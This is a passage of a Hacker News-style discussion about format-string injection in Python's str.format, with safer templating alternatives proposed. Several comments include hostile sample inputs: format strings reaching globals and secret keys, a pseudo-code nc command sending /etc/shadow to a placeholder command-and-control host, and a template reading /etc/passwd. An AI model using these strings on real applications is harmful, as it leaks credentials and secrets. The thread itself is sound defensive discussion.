Be Careful with Python's New-Style String Format

tedunangst · on Dec 31, 2016

Maybe a more fully worked example is needed. You're making a blog hosting service as a service service. Bloggers have different ideas about what page titles should be.

    Post Title
    Blog Name: Post Title
    Blog Name - Post Title
    Post Title - Blog Name
    Blog Name ----embdash---- Post Title
    ~~~ xXx Post Title xXx ~~~

It's a little overwhelming to put every possibility in a dropdown, so you allow the user to specify a format string.

    title = userformats.title.format(post=post)

This doesn't look so very dangerous. And then the user can say

    "{post.title} - {post.blog.title}"
    "{post.title}: Another fine post by {post.author}"
    "~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~"

And then oops.
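
To make the "oops" concrete, here is a minimal sketch. The `Blog` and `Post` classes and the `db_password` field are made up for illustration; the point is only that one `str.format` call serves both the benign and the hostile format string.

```python
class Blog:
    def __init__(self, title, db_password):
        self.title = title
        self.db_password = db_password  # hypothetical sensitive field


class Post:
    def __init__(self, title, blog):
        self.title = title
        self.blog = blog


post = Post("Hello", Blog("My Blog", "hunter2"))

# A benign user-supplied title format.
benign = "{post.title} - {post.blog.title}".format(post=post)

# A hostile one: same call, but it walks to a field the user should never see.
leaked = "~~~ xXx {post.blog.db_password} xXx ~~~".format(post=post)

print(benign)
print(leaked)
```

Nothing in the calling code changes between the two cases, which is why this is easy to miss in review.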

bubblesocks · on Dec 31, 2016

Isn't ingesting user input directly considered a bad idea all around though?

raspie · on Dec 31, 2016

Yes, but it's not obvious how to sanitize input in this case, or that it even needs sanitizing. Formatting a string sounds pretty innocuous.

userbinator · on Dec 31, 2016

I think "it's not obvious how to sanitize input" is the main point here: one advantage of the %-style format strings is that they're easier to parse and escape.

tedunangst · on Dec 31, 2016

But we don't want the string escaped. We want it interpreted.

tzs · on Jan 1, 2017

We want it interpreted, but we don't have to let the language handle it directly. A much safer way is to define our own syntax for this and interpret it in our code, with that code only having access to a limited set of safe substitutions.

For instance, suppose we want to allow user formatting of contact information. A contact entry has a name, address, phone number, and email address. The user supplies a template string using %_NAME_, %_ADDR_, %_PHONE_, and %_EMAIL_ where they would like the name, address, phone number, and email address substituted, respectively.

I'd probably be doing this in Perl, and I'd do it something like this:

  sub format_contact
  {
    my($template, $name, $addr, $phone, $email) = @_;
    my %val = (name => $name, addr => $addr,
            phone => $phone, email => $email);
    $template =~ s/%_([a-z]+)_/$val{lc($1)}/gi;
    return $template;
  }
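
Since the thread is about Python, roughly the same idea might look like the sketch below. The `ALLOWED` tuple and the choice to leave unknown placeholders untouched are my assumptions, not part of the Perl version above.

```python
import re

# The only fields a user template may refer to (assumed for this sketch).
ALLOWED = ("name", "addr", "phone", "email")


def format_contact(template, **contact):
    values = {key: str(contact.get(key, "")) for key in ALLOWED}

    def substitute(match):
        key = match.group(1).lower()
        # Unknown placeholders are left untouched rather than guessed at.
        return values.get(key, match.group(0))

    return re.sub(r"%_([A-Za-z]+)_", substitute, template)


print(format_contact("%_NAME_ <%_EMAIL_>", name="Ann", email="ann@example.com"))
```

The template can only ever name keys in the dictionary, so there is no path from the user's string to arbitrary attributes.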

jgalt212 · on Jan 1, 2017

yes, basically eval is evil

masklinn · on Jan 1, 2017

That's not even eval, the entire thing is a series of dynamic attribute lookups[0], you can trivially implement that in pure Python without needing to `eval` anything.

[0] it also supports mapping and sequence lookups IIRC but that's about the same thing

xapata · on Jan 1, 2017

And yet, eval is necessary for so many important things...

onchance · on Jan 3, 2017

Would sanitizing for double underscores be enough to capture the most dangerous cases?

    import re
    
    def sanitize(user_input):
        """Sanitize user input for str.format
        
        Usage:
            sanitize("{post.title} - {post.blog.title}")
            sanitize("{post.title}: Another fine post by {post.author}")
            sanitize("~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~")
        
        """
        return re.sub(r'{[^}]*__[^}]*}', '', user_input)

Even better, we could specify which variables to allow in user input:

    import re
    
    def sanitize(user_input, *allowed_variables):
        """Sanitize user input for str.format
        
        Usage:
            allowed_variables = ["post.blog.title", "post.title", "post.author"]
            sanitize("{post.title} - {post.blog.title}", *allowed_variables)
            sanitize("{post.title}: Another fine post by {post.author}", *allowed_variables)
            sanitize("~~~ xXx {post.blog.__init__.dbconnection.__keys__.password} xXx ~~~", *allowed_variables)
        
        """
        for match in re.finditer(r'{([^}]*)}', user_input):
            if match[1] not in allowed_variables:
                user_input = user_input.replace(match[0], '')
        return user_input

orangecat · on Dec 31, 2016

Yes, so someone might think to verify that it matches a seemingly safe pattern like "word characters separated by zero or more periods", which is still insufficient.
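
A quick check of why that pattern is insufficient (the regex here is my reading of "word characters separated by periods", so treat it as an assumption):

```python
import re

# The "seemingly safe" shape: identifiers joined by dots.
SAFE_LOOKING = re.compile(r"\w+(\.\w+)*")

field = "post.__init__.__globals__"

# Underscores count as word characters, so dunder names pass the check.
passes = bool(SAFE_LOOKING.fullmatch(field))
print(passes)
```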

foolfoolz · on Dec 31, 2016

ingesting raw user input is good

emitting raw user input is bad

peller · on Dec 31, 2016

Isn't SQL injection caused by ingesting raw user input though?

Seems to me you always have to be careful with user-supplied data.

halomru · on Dec 31, 2016

I would have said that SQL injection is caused by emitting unescaped user input to your SQL server

tlrobinson · on Jan 1, 2017

If I call eval(string) am I emitting unescaped user input to the eval function?

I guess the definition of "ingest" here is reading bytes off the wire?

john_reel · on Jan 1, 2017

If string is unescaped user input, then yes, you are.

meowface · on Dec 31, 2016

"Ingesting raw user input is good if you only use it to interface with other systems that provide a way to separate data from instructions or at least escape strings."

foolfoolz · on Dec 31, 2016

sql injection is commonly caused by combining your query with its related data parameters in unsafe ways. you are emitting raw user input you received to another program, the database, it's your responsibility to give this to the DB safely.

you still have to be careful, and when you follow all the right best practices you can safely ingest raw user input.

I've worked at a company that escaped user input before inserting into the DB. it's a horrible nightmare I don't think anyone should have to experience.
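
A small sketch of the difference, using the standard `sqlite3` module with an in-memory database (the `posts` table and the input string are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE posts (title TEXT)")
conn.execute("INSERT INTO posts VALUES ('hello')")

user_input = "x' OR '1'='1"

# Unsafe: the input becomes part of the SQL text itself.
unsafe_sql = "SELECT title FROM posts WHERE title = '%s'" % user_input
unsafe_rows = conn.execute(unsafe_sql).fetchall()

# Safe: the raw input travels separately as a bound parameter.
safe_rows = conn.execute(
    "SELECT title FROM posts WHERE title = ?", (user_input,)
).fetchall()

print(unsafe_rows)  # every row matches
print(safe_rows)    # nothing matches the literal string
```

In the second query the stored and transmitted value is still the raw input; it is just never mixed into the query text.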

mistaken · on Dec 31, 2016

Even if you don't emit the input you can run commands on the server. You can open up a reverse shell or deduce data from timing based side-channels. IMHO working with raw user data is bad; it should be sanitized/canonicalized before doing anything.

foolfoolz · on Dec 31, 2016

if you're running commands on the server I would consider your program as emitting output directly to another program. it's up to you to make sure you call it correctly and not emit raw user data

nitrogen · on Jan 1, 2017

It seems the format string can run commands on the server.

I don't know Python, so this is a pseudo code example that a user could enter:

    "{system('nc c_and_c_box.example < /etc/shadow \
      > /dev/null')} Nothing to see here, move along"

cyphar · on Jan 1, 2017

Format strings in Python are not equivalent to eval. The syntax looks similar, but it's actually limited to looking up attributes and items (list elements, dict keys) on the objects passed in. Now, with Python's monkey-patchability this is worrying, but it's far from being eval.
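
A sketch of what happens with a call-like field. The `system` function below is a harmless stand-in I made up, not `os.system`:

```python
calls = []


def system(command):
    # Stand-in for os.system; records the call instead of running anything.
    calls.append(command)
    return 0


error = None
try:
    "{system('id')} Nothing to see here".format(system=system)
except KeyError as exc:
    # The whole text "system('id')" was treated as a key name, not as a call.
    error = exc

print(repr(error), calls)
```

The function is never invoked; the formatter just fails to find an argument with that odd name.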

lilyball · on Jan 2, 2017

I feel like this sort of thing should be done with a proper template engine rather than just string formatting.

anderskaseorg · on Dec 31, 2016

The proposed idea of relying on undocumented internals and blacklisting attribute names to securely sandbox formatting strings is _really_ _dangerous_. Never do that in production code! Language expansions could render your sandbox unsafe at any time.

You can write your own safe formatting engine in much less code.

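    import re

    def safe_format(fmt, **args):
        # Unknown fields are left untouched; values are coerced to str for re.sub.
        return re.sub(r'\{([^{}]*)\}', lambda m: str(args.get(m.group(1), m.group(0))), fmt)

    safe_format('{foo} {bar}', foo='Hello', bar='world')  # Hello world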

Add bells and whistles as desired.

wfunction · on Dec 31, 2016

+1 I freaked out when I saw it. Blacklists are just asking to get hacked.

tedunangst · on Dec 31, 2016

The first bell added is likely to be field access.

cyphar · on Jan 1, 2017

Which immediately becomes a security risk because classes can overload __getattr__ and __getitem__. So now you're executing random code.

Of course, %s does the same thing (__str__) but at least %s doesn't take any arguments.

sirclueless · on Jan 1, 2017

The assumption behind string.format and friends is that people who override __getattr__ and __getitem__ know what they're doing. Which is probably a reasonably safe tradeoff in order to allow attribute access.

I'm not worried about executing arbitrary code, because it's not user-supplied and it's normal for a templating library to access attributes of objects you pass to it (if it was unsafe you shouldn't have done that). This is more of a snafu with the number of sensitive and powerful attributes available by default on Python objects.

anderskaseorg · on Jan 2, 2017

Read the article. The danger is not __getattr__ and __getitem__ but rather things like event.__init__.__globals__[CONFIG][SECRET_KEY]. There is no such thing as an object where arbitrary attribute access is safe, because every object has a constructor function and every function references the globals dict.
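
A minimal reproduction of that path, assuming a module-level `CONFIG` dict and an `Event` class with an ordinary Python `__init__` (both invented here to mirror the article's example):

```python
CONFIG = {"SECRET_KEY": "s3cr3t"}  # hypothetical module-level settings


class Event:
    def __init__(self, name):
        self.name = name


event = Event("launch")

# The format call is only handed `event`, yet the field walks from its
# constructor to the globals of the module that defined it.
user_format = "{event.__init__.__globals__[CONFIG][SECRET_KEY]}"
leaked = user_format.format(event=event)

print(leaked)
```

Note that `Event` overrides neither `__getattr__` nor `__getitem__`; plain attribute and item lookup is enough.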

coldtea · on Dec 31, 2016

Err, why would you allow for the user to enter arbitrary format strings in the first place?

Might as well write "be careful about eval of arbitrary user provided strings".

tedunangst · on Dec 31, 2016

"Customize the look of your blog by editing these templates."

coldtea · on Dec 31, 2016

Shouldn't that be based not on the built-in string capabilities, but on a template engine, that must also take care of much narrower cases of abuse (e.g. SQL injection, or allowing access to only a restricted number of helper functions within the template)?

icebraining · on Dec 31, 2016

The author discovered this exploit in the template engine he wrote (Jinja2).

dom0 · on Jan 1, 2017

While the vuln is there, it's a rather obscure way of using the engine in the first place, so in "good" templates it shouldn't be exploitable. See the example in the release: https://www.palletsprojects.com/blog/jinja-281-released/

icebraining · on Jan 1, 2017

Sure, but like tedunangst pointed out, there are valid reasons to allow users to edit those templates, in which case you can't assume they'll be "good".

coldtea · on Jan 1, 2017

Why would a template engine allow for free access to the native platform's string capabilities in the first place?

obstinate · on Jan 1, 2017

Native vs. non-native is irrelevant. A non-native formatting system could have the features of the python formatter that are dangerous. Or, if Python's native formatter lacked these dangerous features, there'd be no reason not to use it.

coldtea · on Jan 1, 2017

>Native vs. non-native is irrelevant. A non-native formatting system could have the features of the python formatter that are dangerous.

Hardly irrelevant. The idea is that a non-native formatting system is built specifically for the templating engine, so the developers control what it can do and give it only non-dangerous features.

>Or, if Python's native formatter lacked these dangerous features, there'd be no reason not to use it

Even if it did lack them, it's not under the control of the template platform author, so they should not rely on it for such a crucial part of the template engine as string formatting.

(Which is exactly the case here: Python lacked those features before, but got them, and bit the template engine in the back).

obstinate · on Jan 2, 2017

> it's not under the control of the template platform author

This doesn't really matter. If it does what you want, it's not like they're going to change the formatter's behavior from under your feet if it's part of the language's default runtime.

nine_k · on Dec 31, 2016

I'll consider switching to a different engine.

jessaustin · on Dec 31, 2016

Perhaps one that hasn't had this exploit fixed yet?

tedunangst · on Dec 31, 2016

Many templates allow accessing fields. There's no risk of SQL injection, you're only echoing the output back to the user.

yawaramin · on Jan 1, 2017

Didn't you just point out that some of those fields could be sensitive, like password info?

dom0 · on Jan 1, 2017

What does the template engine have to do with SQL? Not really following you there.

coldtea · on Jan 1, 2017

A template engine has multiple use cases its author can not foresee, not just creating pages.

Here they talk of using it for translation, with arbitrary user provided strings for example. Another could use it to create an SQL helper (accounting themselves for injection) etc.

In any case, it should not contain dangerous helper methods or capabilities not fit for strictly templating, just because the native string class allows them.

Animats · on Dec 31, 2016

Internationalization, usually. Word order differs between languages, and this kind of format allows reordering the inserted values.

zbraniecki · on Dec 31, 2016

Internationalization should never use arbitrary string or system level formatting.

Look at MessageFormat or L20n. Yeah, I know that it's more complex than what you think you need (I've heard the "let's just use JS template literals" so many times) but you actually do.

Manishearth · on Dec 31, 2016

A lot of folks do use lang format strings for i18n, but they really shouldn't. They won't be able to handle pluralization and other oddities.
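
As a small illustration of the pluralization point, here is a sketch with the standard `gettext` module. No translation catalog is installed, so it falls back to the English singular/plural rule; the message strings are made up.

```python
import gettext


def files_message(count):
    # With no catalog installed, ngettext falls back to the English rule:
    # the first form for exactly 1, the second form otherwise.
    template = gettext.ngettext("%d file deleted", "%d files deleted", count)
    return template % count


print(files_message(1))
print(files_message(3))
```

A single format string has no way to express this choice, and languages with more than two plural forms make it worse.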

coldtea · on Dec 31, 2016

Yes, but that's meant for trusted translators of the UI, not arbitrary users, right?

icebraining · on Dec 31, 2016

In some applications, users can change their own translations, which are stored in the DB, to allow for easier customization.

coldtea · on Jan 1, 2017

Still, no reason to save them in the platform's native string format and with free rein over native strings.

azernik · on Jan 1, 2017

In practice, translators are often externally contracted; the amount of work required to translate any given language is not large enough to make these full-time positions. So only trusted so far.

brianwawok · on Dec 31, 2016

Templates. Very useful in many places.

Although if you are using templates in Python, you are likely using jinja2. And they just "fixed" the bug. So you are good to go if you upgrade.

dom0 · on Jan 1, 2017

Although this only applies to format-string evaluation in Jinja2, which would look something like

    {{ "Hello {user.name}".format(user=user) }}

which is really kinda obscure, especially since Jinja already has an explicit |format using the very safe / limited (but generally sufficient) alternative %(key)s syntax (also suitable for i18n, to some extent).

jlarocco · on Jan 1, 2017

Yeah, that was my first thought, too, and it's not very fair to blame Python's new style string format.

Treating user input as a format string has always been a bad idea in every language and library that uses them.

thinkpad20 · on Jan 1, 2017

Not necessarily true. Type systems can ensure safety without too much effort. For example in Haskell, you might have some sort of format function with the type signature

    -- Given appropriate Error and Context types 
    format :: Context -> Text -> Either Error Text

Which would be guaranteed to be safe (there is no way this function can execute arbitrary code or read from your file system, short of egregious abuses of unsafePerformIO in its implementation). Note that the signature I wrote above takes an explicit context (presumably some sort of mapping of available variables), which removes the need for supporting arbitrary attribute access in the first place, and is more explicit to boot.

There is no reason other languages or libraries could not implement a function with the same degree of safety, although their type systems might not be able to guarantee its safety. In fact I would wager that such pitfalls are only likely to be found in dynamic languages, which support runtime eval (which is, after all, the root of the described problem).

kazinator · on Dec 31, 2016

Sane Lisp approach: provide easily analyzable target syntax.

  This is the TXR Lisp interactive listener of TXR 163.
  Use the :quit command or type Ctrl-D on empty line to  exit.
  1> (defvar foo 42)
  foo
  2> `@(list foo) ... @foo`
  "42 ... 42"

What is that backticked literal? Let's quote it:

  3> '`@(list foo) ... @foo`
  `@(list foo) ... @foo`

Hmm, prints back in same form. Probably syntactic sugar for a list; what is in the car? cdr?

  4> (car '`@(list foo) ... @foo`)
  sys:quasi
  5> (cdr '`@(list foo) ... @foo`)
  ((list foo) " ... " @foo)

What if we type in this syntax ourselves:

  6> '(sys:quasi (list foo) " ... " (sys:var foo))
  `@(list foo) ... @foo`

Prints as the notation!

To sandbox this, we just have to walk a list and enforce some rule. For instance, the rule might be that all elements after sys:quasi must be string objects or else (sys:var sym) forms, where sym is a symbol on some allowed list. Thus (list foo) would be banned.

A custom interpreter which calculates the output string while enforcing the check is trivial to write as a one-liner.
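
For comparison, the same walk-and-check idea can be sketched in Python, since `string.Formatter().parse` exposes a format string as a sequence of literal and field parts. The `checked_format` helper and its rules (bare names only, no format specs or conversions) are my own assumptions for illustration.

```python
from string import Formatter


def checked_format(fmt, values):
    """Render fmt, allowing only bare field names present in `values`."""
    out = []
    for literal, field, spec, conversion in Formatter().parse(fmt):
        out.append(literal)
        if field is None:
            continue  # literal text with no replacement field after it
        if field not in values or spec or conversion:
            raise ValueError("disallowed field: %r" % field)
        out.append(str(values[field]))
    return "".join(out)


print(checked_format("{title} - {blog}", {"title": "Post", "blog": "Blog"}))
```

A field such as `{post.__init__}` is rejected because the whole field name, dots included, has to match an allowed key exactly.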

Of course, if your program just evals such an untrusted quasiliteral, it has access to the dynamic/global environment:

   `Mouhaha! @(file-get-string "/etc/passwd")`

Very convenient for some attacker. :)

shakna · on Dec 31, 2016

If your Lisp has first-class environments, then this becomes much easier, and safer.

    (eval (read (get-some-user-string))
      (let [
             (post-title post-title)
             (post-date post-date)
             (post-author post-author)
             (fmt string-append)
           ]
           (null-environment)))

eval is only executed in the context of some environment, and the only things it has access to are some strings, and a string concatenation procedure.

It doesn't have access to lambda, quasiliterals or quotes, or anything of the like.

I do have code like this in production, because eval only looks up within its environment... Which is empty apart from the bound let. No closure access.

swift · on Dec 31, 2016

Lua has this feature as well and it's fantastically useful for this kind of use-case, or more generally anywhere where you want to allow scripting.

shakna · on Dec 31, 2016

The more I use Lua, the more it seems like the sanest of the scripting languages out there.

kazinator · on Jan 1, 2017

My Lisp has search through a first-class environment which falls back on a dynamic/global environment. A way could be provided to suppress the fallback, like a special environment node indicating "do not search for bindings past me, stop here".

If we have a completely empty environment, then we cannot eval the (sys:quasi ...) form itself; the sys:quasi symbol itself has no binding.

A nice idea might be to have a filter object in the environment stack which says "only if you're looking for one of these specific symbols, can you proceed to the global environment". Then we can easily arrange for select global bindings to be visible.

shakna · on Jan 1, 2017

You don't want the sys:quasi form to evaluate: It can be used as an escape hatch. If you're binding to the null-environment, you can provide everything a user can use.

In my above example, a user can do things like:

    (fmt post-title post-date)
    (fmt post-title "@" post-date)
    (fmt (fmt post-title "@" post-date) "by" post-author)

But they can't escape the sandbox and do anything else.

To make a list, they need access to list, or quote, otherwise they just have numbers and strings, and anything else you give them.

If you give them anything more than a null-environment, you begin to lose the safety of a safe evaluation, which might be something you want to do yourself, but not something that you want a user to have access to, or they'll find an escape hatch, like sys:quasi, and gain access to areas they shouldn't.

Which is as bad as any SQL injection, if not worse.

So, a safe eval, can be created, without the need for any further analysis, if eval is handed an environment, and only uses it.

If the eval then searches the global environment, then the eval is unsafe, and you should never hand it user input, unless you have first ensured it's safe... Which defeats all the niceness provided by first class environments.

Eval is only not evil, if the programmer controls all the bindings to eval's environment.

REPLs usually use an unsafe eval and environment, and that makes sense, as you want to be able to do anything you want in code.

But a templating language doesn't need, and shouldn't use, all the unsafeness of a Turing Complete language, that might have access to your system.

nhumrich · on Dec 31, 2016

This article makes you think the new f-strings will be discussed. What is really being discussed is 'string'.format(), which isn't new in any way.

eternauta3k · on Dec 31, 2016

It's referred to in the documentation as 'New-style', with the old style being the % operator.

tedmiston · on Dec 31, 2016

Yes but quite confusing when we have another new style string format actively being discussed in recent months vs this "new-style formatting" which has existed since 2006.

It's much clearer to just refer to it as str.format.

halomru · on Dec 31, 2016

It's what invariably happens when you incorporate words like "new", "super" or "high definition" in the name of something. I'm still hoping that at some point our industry learns that lesson.

smitherfield · on Jan 1, 2017

It does feel a little (unintentionally?) clickbaity.

Animats · on Dec 31, 2016

No, Rust does not have the ability to access any variable in the program via a format string. Rust has this:

   format!("{argument}", argument = "test");   // => "test"

That's just named arguments to the format. Also, that's a macro; it's expanded at compile time.

Python's approach is lame. It should have used something with a limited list of named arguments, or maybe a dict.

gizmo686 · on Dec 31, 2016

Neither does python.

The problem being discussed here is that the format string can access any attribute of the object passed in. From PEP3101 [0]:

" Unlike some other programming languages, you cannot embed arbitrary expressions in format strings. This is by design - the types of expressions that you can use is deliberately limited. Only two operators are supported: the '.' (getattr) operator, and the '[]' (getitem) operator. The reason for allowing these operators is that they don't normally have side effects in non-pathological code."

[0] https://www.python.org/dev/peps/pep-3101/

unscaled · on Jan 1, 2017

Which is still not safe enough, and in effect can be used to access any global variable as described in the OP article.

Rust formatting is done by macros - which expand at compile time and accept only string literals. This makes it impossible to pass user input to format!(), println!() and their ilk unless the end-user can access your compiler, in which case you have a much larger problem.

steveklabnik · on Jan 1, 2017

There are crates like https://crates.io/crates/strfmt which let you accept a non-literal.

detaro · on Dec 31, 2016

> don't normally have side effects in non-pathological code

so, "be careful with it if you can't make sure the code is non-pathological or friendly", which is what the article says.

gizmo686 · on Dec 31, 2016

The example is not pathological. The property that the PEP states is that the expression should not have side effects, which is the case.

Having pathological code in this context only elevates the severity from a pure data leak to partial code execution. Of course partial code execution in an unexpected context often leads to arbitrary code execution.

geofft · on Dec 31, 2016

In many webapps, there's a very easy way to go from a data leak to arbitrary code execution. For instance, if you have signed cookies that are pickles of data, the cookie signing key lets you execute arbitrary code (because pickle deserialization can execute arbitrary code).
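
For anyone who has not seen why unpickling attacker-controlled bytes is code execution, here is a harmless sketch. The `Payload` class is made up, and `sum` stands in for whatever callable an attacker would really choose (think `os.system`).

```python
import pickle


class Payload:
    def __reduce__(self):
        # Tells pickle: "to rebuild me, call sum([40, 2])".
        # The callable and its arguments are chosen by whoever made the bytes.
        return (sum, ([40, 2],))


blob = pickle.dumps(Payload())

# Loading does not give back a Payload; it gives back whatever the call returned.
restored = pickle.loads(blob)
print(restored)
```

So anyone who learns the cookie signing key can hand the server a validly signed blob like this one.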

dom0 · on Jan 1, 2017

... which is why it's a poor idea to do that in the first place, since it has literally a single layer of protection against remote, unauthorized, arbitrary code execution, that depends on keeping a static key secret.

Much better idea to use a stupid, non-ACE serialization there.

echelon · on Dec 31, 2016

> Neither does python.

I would argue that being able to access any global value is a sufficient enough concern.

zardeh · on Dec 31, 2016

The security issue here isn't with f strings, which oddly enough, don't have this flaw (because they are literals only). This has to do with new style string formatting, which does not have access to globals.

progval · on Dec 31, 2016

> It should have used something with a limited list of named arguments, or maybe a dict.

Python does have that feature, called Template Strings: https://docs.python.org/3/library/string.html#template-strin...
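
A short sketch of how `string.Template` behaves with the blog-title use case (the field names and values are made up):

```python
from string import Template

values = {"title": "Post Title", "blog": "Blog Name"}

ok = Template("$blog: $title").substitute(values)

# Attribute-style paths are not part of the syntax: "${title}" is replaced
# and the rest is kept as literal text.
probe = Template("${title}.__class__").safe_substitute(values)

# Unknown names are left in place by safe_substitute.
unknown = Template("$secret").safe_substitute(values)

print(ok)
print(probe)
print(unknown)
```

The user can only name keys of the mapping that was passed in; there is no attribute or item syntax to abuse.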

tedmiston · on Dec 31, 2016

Agree that these are a much better solution that I wish Armin would have dedicated a few sentences to.

Manishearth · on Dec 31, 2016

> It should have used something with a limited list of named arguments, or maybe a dict.

That's what "old-style" python interpolation did :)

You could do |"hi my name is %s and I live in %s" % (name, place)| or use named arguments with a dict (|"hi my name is %(name)s and I live in %(place)s" % {"name": name, "place": place}|).

I like JS format strings -- you can write arbitrary code in them, but they are compile time only (and use a different string syntax). So you can have |`Hello my name is ${name} and I come from ${place}. My profession is ${generate_random_profession()}`|. The backtick-string isn't a different type, and can't be moved around like a value. It's a different kind of way of specifying a string literal, and will be evaluated when specified. No way of doing injection there.

I suspect Python wanted to make it less verbose with new-style interpolation, and went a bit overboard with field access without realizing or caring about possible security issues like this.

Of course, python has a third kind of format string; interpolation string literals (|f"hello my name is {name} ..."|), which work like JS and Ruby. This is what you should be using IMO.

saghm · on Jan 1, 2017

> I like JS format strings -- you can write arbitrary code in them, but they are compile time only

Genuinely curious: what exactly does "compile-time" mean in the case of JS? Is it like C macros (modifying the source code before parsing)?

Manishearth · on Jan 1, 2017

No, it's not that, I was using the term loosely.

I meant that you cannot use a string value as a format string. It only exists in the form of a literal, and it gets evaluated when the interpreter evaluates that literal. You cannot store it and format it later.

saghm · on Jan 1, 2017

Ah, I see. Thanks!

kukx · on Dec 31, 2016

Also, in C# the string interpolation works only on literal strings at compile time. So it's not possible to inject malicious code this way from outside of the source code.

icebraining · on Dec 31, 2016

Same in Python. This isn't string interpolation, it's the equivalent of String.Format.

lilyball · on Jan 2, 2017

FWIW, Rust's syntax is based on Python's, but yeah, you can't access value fields in Rust's syntax.

agentgt · on Dec 31, 2016

This is actually a problem with a lot of languages that allow runtime, template-like string interpolation.

For example Groovy on the JVM has GStrings, with which one can do fairly nasty things.

It is also fairly hard to lock down most of the template languages on the JVM for user templates. (If you are going to allow user templates I recommend one of the Java Mustache-like implementations).

ryanmccullagh · on Dec 31, 2016

This is the same principle for not passing user input to the first argument of `printf(3)` in C. Coming from C, I would never allow the user control of the format string if I were writing code.

cyphar · on Jan 1, 2017

The reason printf strings in C are unsafe is not applicable in Python though. You cannot access memory directly, and %n doesn't exist (nor do the other fun POSIX requirements that write to random places on the stack). In fact, Python's C-style formatting strings are immune to this problem (even the extended form that allows you to name arguments).
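
A sketch of the named-argument form, showing that a dotted name is just a dictionary key (the `User` class and values are made up):

```python
class User:
    name = "alice"


values = {"user": User(), "name": "alice"}

plain = "hi %(name)s" % values

try:
    "hi %(user.name)s" % values
    outcome = "formatted"
except KeyError as exc:
    # "user.name" is looked up as one literal key; no attribute access happens.
    outcome = "KeyError: %s" % exc.args[0]

print(plain)
print(outcome)
```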

jlarocco · on Jan 1, 2017

That's pointless nitpicking. The point is that user specified format strings allow the user to access things they shouldn't be able to access. It's the same in every language that has format strings.

cyphar · on Jan 2, 2017

> That's pointless nitpicking. The point is that user specified format strings allow the user to access things they shouldn't be able to access. It's the same in every language that has format strings.

It's not nitpicking. Go's format strings don't allow you to access stuff you shouldn't be able to. In fact, Go's templating language[1] doesn't allow you to access anything that you haven't explicitly provided to the template instance.

Allowing users to format text is not an impossible problem. It's the fault of language creators that they don't make this easier.

[1]: https://golang.org/pkg/text/template/

peterwaller · on Dec 31, 2016

Reminds me of the Turing-complete interpreter lurking in libc's printf.

https://github.com/HexHive/printbf

tzury · on Jan 1, 2017

If sensitive data is available within the context that parses and executes user input, then what does this have to do with New-Style String Format? I mean,

    {event.__init__.__globals__[CONFIG][SECRET_KEY]}

Shall not be available to any function call, whatsoever!

innocentoldguy · on Dec 31, 2016

While I agree this is a possible attack vector, I think it is extremely unlikely, at least in the localization realm, for several reasons:

1. The localization company should never know what programming language you're using.

2. You shouldn't give localization companies direct access to your internal strings. More than hacking your code, they're almost guaranteed to screw the formatting up.

3. Typically, translators are hired for their native language abilities, and not for their technical prowess. I've met precious few who knew how to open a text editor, let alone hack your product via its strings.

I worked with Python and I18N/L10N for about 15 years. The way I always handled localization was to parse all our strings into a PostgreSQL database, and then provide a web interface for translators to do their work. This interface provided translators with the full-context of the strings they were translating, which internal strings often don't, prevented the inclusion of certain characters and keywords, and kept the translators from screwing up the formatting. By doing it this way, we got much better translations, and our internal strings were never out of our control.

the_mitsuhiko · on Dec 31, 2016

Most internationalization these days goes through things like transifex. Becoming a translator on a specific project is not completely unlikely if you want to target it.

bubblesocks · on Dec 31, 2016

I find it depends on the project and the localization company. I've used big ones, like Lingotek and LION (or whatever they're called now), but there are still a lot of small companies that do things manually, and for a lot less.

Manishearth · on Dec 31, 2016

Yeah, I never liked Python's "new-style" format because of this. It didn't occur to me that you could use field access to access globals (never done enough Python metaprogramming to mess with the reflection stuff), but I was afraid of arbitrary getters being invoked.

In general I'm very wary of runtime string formatting. Strings tend to be untrusted input with a large degree of freedom. format strings are almost always known at compile time (and more trustworthy). If your interpolation system is more than simply mapping keys to values or positions, you should probably restrict it to compile time. Feel free to expose a harder-to-use runtime API. Rust has compile-time format strings, for example. They're not as powerful as `str.format`, but they could be without there being security issues. JS has a different syntax for format literals. Regular strings cannot be "formatted", you must specify a string literal with backticks and that gets converted to a string value when the interpreter gets there. These literals can execute arbitrary code, but since it's just literals there's no way for an untrusted string to get in there.

One main use case for runtime string formatting is i18n. But that really should use a different solution. Most string formatting APIs are geared for programmer convenience -- the programmer is writing the code and the string. The scales shift for translators, who are only writing the strings. They don't need things like field access and stuff.

Besides, most string formatting APIs are inadequate for i18n, at least if you want to handle stuff like pluralization (http://mlocati.github.io/cldr-to-gettext-plural-rules/).
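To make the pluralization point concrete, here is a minimal sketch using the standard library's `gettext.ngettext`. It assumes no translation catalog is installed, so the call falls back to the English singular/plural pair; the message text and the `describe` helper are made up for illustration.

```python
import gettext

def describe(count):
    # ngettext picks the message form for `count`. With a real catalog the
    # target language's own plural rule (possibly more than two forms) applies;
    # without one it falls back to singular for 1 and plural otherwise.
    template = gettext.ngettext("%d file deleted", "%d files deleted", count)
    # Only a plain value is substituted; the translator's string cannot
    # reach into objects.
    return template % count

print(describe(1))
print(describe(3))
```

The translator only ever supplies strings containing `%d`, which is about all the power this use case seems to need.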

Another use case is template engines and stuff like that. In that case, field access is useful, but you probably should exert more control on these things (which is exactly what jinja2 seems to be doing here)

At one point I toyed with an idea for a super-type-safe template engine in Rust. It would validate the templates at compile time, and additionally ensure that the right types are in the right places. For example, it could ensure that strings that get interpolated with the HTML are either "trusted", escaped, or otherwise XSS-sanitized (using the type system to mark such types). Similarly, url attributes (href, etc) can only have URLs that have been checked for `javascript:`. Never got around to writing it, sadly.

unscaled · on Jan 1, 2017

I was always puzzled by Python's insistence on forgoing string interpolation until the latest version.

Runtime string formatting, even if done safely (e.g. .NET's String.Format() which doesn't have property access AFAIK), can still cause unexpected exceptions at the very least, and suffers from inferior performance.

yladiz · on Dec 31, 2016

So is the issue that it's a problem to let the format string be controlled arbitrarily? It's good to warn users around it because some may not know the dangers, but in general you don't trust user input, so I don't really see this as something you need to build something custom around, rather just be careful and follow good practices. It should be understood not to pass user data directly to internal code without sanitizing it. Proposing some custom code that uses undocumented internal features is overkill and also dangerous since things that aren't documented/internal can change suddenly.

geofft · on Dec 31, 2016

> It should be understood not to pass user data directly to internal code without sanitizing it.

But how do you sanitize it? If you hadn't read this article and were told to sanitize a format string, how would you implement that?

Unless you know exactly what the problem is, you're basically reduced to writing your own string formatter. (Though see 'anderskaseorg's example, it's a lot less code if you do.)

tedmiston · on Dec 31, 2016

